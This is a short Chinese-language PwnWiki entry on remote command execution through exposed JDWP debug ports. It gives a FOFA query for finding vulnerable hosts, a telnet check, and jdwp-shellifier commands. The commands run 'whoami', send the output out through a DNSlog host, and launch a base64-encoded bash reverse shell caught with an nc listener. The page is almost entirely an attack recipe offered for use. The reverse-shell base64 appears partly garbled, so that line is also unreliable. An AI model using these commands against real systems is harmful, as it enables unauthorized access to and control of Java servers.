Loading
0

JDWP 远程命令执行漏洞

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

FOFA

banner=”jdwp” && port="8000"

POC

telnet xxx.xxx.xxx.xxx 8000

返回以下信息,表示漏洞存在。但是请注意,部分情况下无任何回显也能成功利用。

JDWP-Handsharke

EXP

https://github.com/IOActive/jdwp-shellifier

python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "whoami"

使用Dnslog回显:

python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "ping http://.`whoami`.yoww7w.dnslog.cn"

Getshell

python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "bash -c {echo,YmFzaCAtaSA+JiAvfrV2L3RjcC8xOTIgrth4LjE4NS42Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}"

监听机器执行:

nc -lvp 8888

pwnwiki.com